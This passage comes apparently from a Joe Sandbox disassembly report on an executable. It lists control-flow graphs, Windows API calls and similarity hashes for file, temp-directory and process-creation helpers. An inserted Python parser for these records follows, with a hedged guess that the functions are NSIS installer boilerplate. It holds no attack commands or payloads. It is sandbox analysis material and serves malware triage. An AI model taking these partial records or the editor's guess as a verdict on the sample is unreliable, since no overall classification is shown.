                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                    • String ID: %s%S.dll$UXTHEME
                                                                                                                                    • API String ID: 2200240437-1106614640
                                                                                                                                    • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                                                                    • Instruction ID: a217f45d9ff01499786c61cea798a126a457230594f844882b590dd92c6ddc53
                                                                                                                                    • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                                                                    • Instruction Fuzzy Hash: 69F0F671501219A6CF14BB68DD0DF9B376CAB40304F21447AA646F20E0EB789B69CBA8
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 485 406076-406082 486 406083-4060b7 GetTickCount GetTempFileNameW 485->486 487 4060c6-4060c8 486->487 488 4060b9-4060bb 486->488 489 4060c0-4060c3 487->489 488->486 490 4060bd 488->490 490->489
APIs
• GetTickCount.KERNEL32 ref: 00406094
• GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403530,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C), ref: 004060AF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
Similarity
• API ID: CountFileNameTempTick
• String ID: C:\Users\user\AppData\Local\Temp\$nsa
• API String ID: 1716503409-678247507
• Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
• Instruction ID: 86e06e500a6970b3bc5bd370241205c1b86a0a172d82c816bfbfc8c597d973d5
• Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
• Instruction Fuzzy Hash: 65F09076B50204FBEB10CF69ED05F9EB7ACEB95750F11803AED05F7240E6B099548768
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 491 4015c6-4015da call 402dab call 405ed1 496 401636-401639 491->496 497 4015dc-4015ef call 405e53 491->497 499 401668-4022fb call 401423 496->499 500 40163b-40165a call 401423 call 406557 SetCurrentDirectoryW 496->500 505 4015f1-4015f4 497->505 506 401609-40160c call 405b05 497->506 514 402c2f-402c3e 499->514 500->514 517 401660-401663 500->517 505->506 511 4015f6-4015fd call 405b22 505->511 515 401611-401613 506->515 511->506 521 4015ff-401607 call 405aab 511->521 518 401615-40161a 515->518 519 40162c-401634 515->519 517->514 522 401629 518->522 523 40161c-401627 GetFileAttributesW 518->523 519->496 519->497 521->515 522->519 523->519 523->522
APIs
  • Part of subcall function 00405ED1: CharNextW.USER32(?,?,0042F270,?,00405F45,0042F270,0042F270,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
  • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
  • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
• GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
  • Part of subcall function 00405AAB: CreateDirectoryW.KERNEL32(00437800,?), ref: 00405AED
• SetCurrentDirectoryW.KERNELBASE(?,00440000,?,00000000,000000F0), ref: 00401652
Memory Dump Source
• Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
Similarity
• API ID: CharNext$Directory$AttributesCreateCurrentFile
• String ID:
• API String ID: 1892508949-0
• Opcode ID: 17db5344e59f9fcfaa0a8c6f5cb64453528f6d3e60a55d917771fd137aa83741
• Instruction ID: 6fd3d265dcb44280b24f8e6f21651466162e19908bb00ba525d5af3adea1cd3c
• Opcode Fuzzy Hash: 17db5344e59f9fcfaa0a8c6f5cb64453528f6d3e60a55d917771fd137aa83741
• Instruction Fuzzy Hash: F211E231404104ABCF206FA5CD0159F36B0EF04368B25493FE945B22F1DA3D4A81DA5E
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 527 401389-40138e 528 4013fa-4013fc 527->528 529 401390-4013a0 528->529 530 4013fe 528->530 529->530 532 4013a2-4013a3 call 401434 529->532 531 401400-401401 530->531 534 4013a8-4013ad 532->534 535 401404-401409 534->535 536 4013af-4013b7 call 40136d 534->536 535->531 539 4013b9-4013bb 536->539 540 4013bd-4013c2 536->540 541 4013c4-4013c9 539->541 540->541 541->528 542 4013cb-4013f4 MulDiv SendMessageW 541->542 542->528
APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
• SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
Memory Dump Source
• Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
• Instruction ID: 0adee223d2b7ba7d815a442a2885e1f2b60e3b86eb1a18037e9b6c54a102055c
• Opcode Fuzzy Hash: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
• Instruction Fuzzy Hash: 0E01FF31620220AFE7195B389E05B6B3698E710329F10863FF851F62F1EA78DC429B4C
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 543 405b3a-405b6b CreateProcessW 544 405b79-405b7a 543->544 545 405b6d-405b76 CloseHandle 543->545 545->544
APIs
• CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
• CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
Memory Dump Source
• Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
Similarity
• API ID: CloseCreateHandleProcess
• String ID:
• API String ID: 3712363035-0
• Opcode ID: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
• Instruction ID: b1032d8704f3223f2a9afbe03a7757fefc60a77e8ecf1711bb84520e71ece662
• Opcode Fuzzy Hash: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
• Instruction Fuzzy Hash: 91E09AB4600219BFEB109B74AD06F7B767CE704604F408475BD15E2151D774A8158A78
Uniqueness

Uniqueness Score: -1.00%
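
The records above are exported as flat text: a `control_flow_graph` line that lists numbered basic blocks, their address ranges, the calls the graph places in each block (`call <addr>` for another function in the image, a bare name for an imported API) and the edges between blocks, followed by the API calls with call-site references and the Similarity fields. That is readable for one function and tedious for fifty, which is what an analyst faces when deciding which functions are installer or packer boilerplate and which carry the payload. The Python below is an added example written for this page, not code from the report or from Joe Sandbox: it parses that layout into structured records and answers questions such as which APIs a function itself calls, in call-site order, and whether its control-flow graph contains a loop. The embedded sample is constructed from the two records above at 4068db (GetSystemDirectoryW, wsprintfW, LoadLibraryExW) and 406076 (GetTickCount, GetTempFileNameW), with leading whitespace removed; the section names and token format are assumed to be exactly as they appear on this page, and the names `SAMPLE`, `ApiCall`, `FunctionRecord`, `parse_cfg` and `parse_report` are the example's own.

```python
"""Parser for the per-function records of a Joe Sandbox disassembly section: an added example
for this page, not Joe Sandbox code. SAMPLE is two records copied from the report above."""
import re
from dataclasses import dataclass, field
from types import SimpleNamespace
SAMPLE = r"""Control-flow Graph
• Executed
control_flow_graph 478 4068db-4068fb GetSystemDirectoryW 479 4068fd 478->479 480 4068ff-406901 478->480 479->480 481 406912-406914 480->481 482 406903-40690c 480->482 484 406915-406948 wsprintfW LoadLibraryExW 481->484 482->481 483 40690e-406910 482->483 483->484
APIs
• GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
• wsprintfW.USER32 ref: 0040692D
• LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406941
Similarity
• API ID: DirectoryLibraryLoadSystemwsprintf
• String ID: %s%S.dll$UXTHEME
Control-flow Graph
control_flow_graph 485 406076-406082 486 406083-4060b7 GetTickCount GetTempFileNameW 485->486 487 4060c6-4060c8 486->487 488 4060b9-4060bb 486->488 489 4060c0-4060c3 487->489 488->486 490 4060bd 488->490 490->489
APIs
• GetTickCount.KERNEL32 ref: 00406094
• GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403530,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C), ref: 004060AF
Similarity
• API ID: CountFileNameTempTick
• String ID: C:\Users\user\AppData\Local\Temp\$nsa
"""

API_LINE = re.compile(  # '• [Part of subcall function X: ]Name.Module[(args)][,] ref: ADDR'
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?(?P<name>\w+)\."
    r"(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
EDGE = re.compile(r"^\d+->\d+$")
SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Uniqueness")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int                         # call-site address
    subcall_of: "int | None" = None  # set for "Part of subcall function X:" lines (inherited calls)

@dataclass
class FunctionRecord:
    blocks: dict = field(default_factory=dict)  # block id -> SimpleNamespace(start, end, calls, callees)
    edges: list = field(default_factory=list)   # (source block id, target block id)
    apis: list = field(default_factory=list)    # ApiCall objects in report order
    fields: dict = field(default_factory=dict)  # e.g. "String ID" -> ["%s%S.dll$UXTHEME"] ('$' joins several)

    def entry(self) -> int:  # id of the block at the lowest address
        return min(self.blocks, key=lambda b: self.blocks[b].start)

    def api_names(self) -> list:  # the function's own calls, in call-site order
        return [a.name for a in sorted(self.apis, key=lambda a: a.ref) if a.subcall_of is None]

    def back_edges(self) -> list:  # edges back onto the current DFS path from the entry: loops
        path, seen, found = [], set(), []
        def walk(b):
            path.append(b); seen.add(b)
            for d in (d for s, d in self.edges if s == b):
                if d in path:
                    found.append((b, d))
                elif d not in seen:
                    walk(d)
            path.pop()
        walk(self.entry())
        return found

def parse_cfg(line: str):
    """'<id> <start>[-<end>]' opens a block, followed by the calls inside it ('call <addr>' for
    another function, a bare API name otherwise); '<a>-><b>' is an edge between block ids."""
    blocks, edges, cur, toks = {}, [], None, iter(line.split()[1:])  # drops the keyword token
    for tok in toks:
        if EDGE.match(tok):
            edges.append(tuple(int(x) for x in tok.split("->")))
        elif tok.isdigit():  # block id, always followed by its address range
            lo, _, hi = next(toks).partition("-")
            cur = blocks[int(tok)] = SimpleNamespace(start=int(lo, 16), end=int(hi or lo, 16), calls=[], callees=[])
        elif tok == "call":
            cur.callees.append(int(next(toks), 16))
        else:
            cur.calls.append(tok)
    return blocks, edges

def parse_report(text: str) -> list:
    records, rec, section = [], FunctionRecord(), None  # text before the first header goes to a dummy
    for line in (raw.strip() for raw in text.splitlines()):
        if line == "Control-flow Graph":  # every record opens with this header
            rec, section = FunctionRecord(), "cfg"
            records.append(rec)
        elif line.startswith("control_flow_graph "):
            rec.blocks, rec.edges = parse_cfg(line)
        elif line in SECTIONS:
            section = line
        elif section == "APIs" and (m := API_LINE.match(line)):
            args = m.group("args").split(",") if m.group("args") is not None else []
            sub = int(m.group("sub"), 16) if m.group("sub") else None
            rec.apis.append(ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16), sub))
        elif line.startswith("•") and section not in ("cfg", "APIs"):  # "cfg" skips the graph legend
            key, _, value = line[1:].partition(":")
            rec.fields.setdefault(key.strip(), []).append(value.strip())
    return records
```

Lines the report marks "Part of subcall function" are calls inherited from a callee; the parser keeps them with `subcall_of` set, but `api_names()` leaves them out, so the 406076 record yields GetTickCount followed by GetTempFileNameW and nothing else. `back_edges()` runs a depth-first walk from the lowest-address block and reports edges that land back on the current path, which is the correct loop test: plain address order would misreport 487->489 in that record, where block 487 merely jumps to an epilogue placed earlier, whereas the walk returns only 488->486, the retry around GetTempFileNameW. A temp-file prefix of `nsa` combined with a GetTickCount-driven retry, and a `%s%S.dll` system-directory loader used to pull in UXTHEME, are the helper routines of the NSIS installer stub as published in its source code; that attribution is the editor's inference from the API and string records, not a finding the report states, and if it holds these functions are installer boilerplate to pass over quickly rather than payload code.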

Control-flow Graph

control_flow_graph 546 40694b-406965 GetModuleHandleA 547 406971-40697e GetProcAddress 546->547 548 406967-406968 call 4068db 546->548 549 406982-406984 547->549 551 40696d-40696f 548->551 551->547 552 406980 551->552 552->549
APIs
• GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
• GetProcAddress.KERNEL32(00000000,?), ref: 00406978
  • Part of subcall function 004068DB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
  • Part of subcall function 004068DB: wsprintfW.USER32 ref: 0040692D
  • Part of subcall function 004068DB: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406941
Memory Dump Source
• Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2547128583-0
                                                                                                                                    • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                                                                                    • Instruction ID: ff64ee7455e026c1647d72c339307a336527f79dacb59e64982fca04d7429b22
                                                                                                                                    • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                                                                                    • Instruction Fuzzy Hash: 38E08673504210AFD61057705D04D27B3A89F85740302443EF946F2140DB34DC32ABA9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 553 406047-406073 GetFileAttributesW CreateFileW
APIs
• GetFileAttributesW.KERNELBASE(00000003,004030C2,00442800,80000000,00000003), ref: 0040604B
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
Memory Dump Source
• Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
• Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
• Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
• Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
• Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 554 406022-406032 GetFileAttributesW 555 406041-406044 554->555 556 406034-40603b SetFileAttributesW 554->556 556->555
APIs
• GetFileAttributesW.KERNELBASE(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
• SetFileAttributesW.KERNEL32(?,00000000), ref: 0040603B
Memory Dump Source
• Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
• Instruction ID: 97cbb32404f08d1f6fed837f871d2b37f55cf766f9720be9b575451f5cdabe77
• Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
• Instruction Fuzzy Hash: A3D0C972504220AFC2102728AE0889BBB55EB542717028A35FCA9A22B0CB304CA68694
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 557 405b05-405b13 CreateDirectoryW 558 405b15-405b17 557->558 559 405b19 GetLastError 557->559 560 405b1f 558->560 559->560
APIs
• CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
• GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B19
Memory Dump Source
• Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
• Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
• Instruction ID: 8c4969e502f5bc4c8dfdefb7e9c2ba363b64d1215f12130c86bef4ebeef6f559
• Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
• Instruction Fuzzy Hash: 19C08C30310902DACA802B209F087173960AB80340F158439A683E00B4CA30A065C92D
Uniqueness

Uniqueness Score: -1.00%

APIs
• ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E7,00000000,00000000,0040330B,000000FF,00000004,00000000,00000000,00000000), ref: 004060DE
Memory Dump Source
• Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
• Instruction ID: a77d82ba430c16999eb1f2306cb11816df14181100402a9e04059793f1b3015d
• Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
• Instruction Fuzzy Hash: 21E08632150219ABCF10DF948C00EEB3B9CFF04390F018436FD11E3040D630E92197A4
Uniqueness

Uniqueness Score: -1.00%

APIs
• WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040349D,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 0040610D
Memory Dump Source
• Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
• Instruction ID: 78408803ccc59d93ae5352641a5e7b8f709900c8df5e8e9e13d69f82a1dcf02f
• Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
• Instruction Fuzzy Hash: 8FE08C3220021ABBCF109E908C00EEB3FACEB003A0F014432FA26E6050D670E83097A4
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034F8
Memory Dump Source
• Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
• Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
• Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                                    • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004055DC: lstrlenW.KERNEL32(0042BA48,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
